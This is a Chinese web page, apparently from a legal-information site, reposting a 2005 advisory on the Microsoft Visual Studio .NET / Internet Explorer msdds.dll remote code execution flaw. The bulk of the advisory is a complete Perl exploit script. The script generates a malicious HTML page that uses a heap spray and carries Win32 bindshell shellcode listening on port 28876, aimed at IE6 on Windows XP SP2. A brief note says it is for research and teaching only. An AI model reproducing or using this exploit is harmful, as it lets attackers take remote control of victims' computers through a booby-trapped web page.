法搜网--搜尽天下法律信息
本站网络实名:法搜
设为首页  |  法搜首页 |  法搜论坛 |  法搜排行榜 |  法律新闻  |  案例

  请您加入我们的"法律聚焦"邮件列表.
  报道法律热门新闻、经典案例分析、法律实事讨论


  
  文章搜索
内 容
类 别
  今日热点

上下班被自行车撞伤纳入工伤
刑法修正案八草案提请审议
男子强奸16女子被注射式死刑
女经理15张信用卡透支24万
绑匪心软偷放女人质后自首
检察院决定不予逮捕

国务院首次明确推进房产税改革
北京中小学取消户籍壁垒
外地生可
免费入学
河南坐11年冤狱农民赵作海获65万...
百度告青岛联通流量劫持案件胜诉

  首页 >> 网络安全 >> 最新漏洞
Microsoft Visual Studio .NET msdds.dll远程代码执行漏洞
WWW.FSOU.COM 来源:www.fsou.com 时间:2005-10-21

 
 
涉及程序:
Microsoft Visual Studio .NET
 
描述:
Microsoft Visual Studio .NET msdds.dll远程代码执行漏洞
 
详细:
Visual Studio .NET是用于创建和集成XML Web服务和应用程序的综合开发工具。

Microsoft Visual Studio .NET中的漏洞可能允许攻击者远程执行任意代码。

目前更多信息不详。

<*来源:Microsoft
*>
 
攻击方法:
警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/perl
#######################################################
#
# Microsoft Internet Explorer "Msdds.dll" Remote Code Execution Exploit
(0day)
#
# Bindshell on port 28876 - Vulnerability discovered and exploited by
Anonymous
#
# PoC code ripped from Berend-Jan Wever's Internet-Exploiter
#
# Vulnerable : EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F (Msdds.dll)
#
# Tested on : Microsoft Internet Explorer 6 SP2 (Windows XP SP2)
#
# Code usage : perl IE-Msddsdll-0day.pl > mypage.html
#
#######################################################
#
# This program is free software; you can redistribute it and/or modify it
under
# the terms of the GNU General Public License version 2, 1991 as published
by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but
WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# A copy of the GNU General Public License can be found at:
# http://www.gnu.org/licenses/gpl.html
# or you can write to:
# Free Software Foundation, Inc.
# 59 Temple Place - Suite 330
# Boston, MA 02111-1307
# USA.
#
#######################################################

# header
my $header = "<html><body>\n<SCRIPT language=\"javascript\">\n";

# Win32 bindshell (port 28876) - SkyLined
my $shellcode = "shellcode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb".
"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea".
"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7".
"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b".
"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64".
"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c".
"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe".
"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0".
"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050".
"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6".
"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650".
"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa".
"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656".
"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1".
"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353".
"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353".
"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe".
"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff".
"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\");\n";

# Memory
my $code = "bigblock = unescape(\"%u0D0D%u0D0D\");\n".
"headersize = 20;\n".
"slackspace = headersize+shellcode.length\n".
"while (bigblock.length<slackspace) bigblock+=bigblock;\n".
"fillblock = bigblock.substring(0, slackspace);\n".
"block = bigblock.substring(0, bigblock.length-slackspace);\n".
"while(block.length+slackspace<0x40000) block = block+block+fillblock;\n".
"memory = new Array();\n".
"for (i=0;i<700;i++) memory[i] = block + shellcode;\n".
"</SCRIPT>\n";

# Msdds.dll
my $clsid = 'EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F';

# footer
my $footer = "<object
classid=\"CLSID:".$clsid."\"></object></body></html>\n".
"Microsoft Internet Explorer Msdds.dll COM Object Remote Exploit\n";

# print "Content-Type: text/html;\r\n\r\n"; # if you are in cgi-bin
print "$header $shellcode $code $footer";
 
解决方案:
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/technet/security/
  相关文章
Microsoft Windows MSRPC SVCCTL服务枚举漏洞 (2005.10.21)
Microsoft Windows MSRPC Eventlog信息泄漏漏洞 (2005.10.21)
Microsoft Internet Explorer JPEG图形渲染溢出漏洞(MS05-038) (2005.10.21)
COM 对象 (Msdds.dll) 可能导致 Internet Explorer 意外退出(2005.10.21)
Microsoft Windows PKINIT信息泄漏和欺骗漏洞(MS05-042) (2005.10.21)
Microsoft Windows RDP远程桌面协议拒绝服务漏洞(MS05-041) (2005.10.21)
Microsoft Windows Kerberos拒绝服务漏洞(MS05-042) (2005.10.21)
Microsoft Windows Telephony服务远程代码执行漏洞(MS05-040)(2005.10.21)
Microsoft IIS 5.1 FAT/FAT32文件系统网页源码泄露漏洞(2005.10.21)
Microsoft Windows键盘事件权限提升漏洞(2005.10.21)
 
设为首页  |  法搜首页 |  法搜论坛 |  法搜排行榜 |  关于法搜  |  招聘信息

本站网络实名:法搜 Copyright © 2007 FSou!  京ICP备05006567号不良信息举报中心

1 1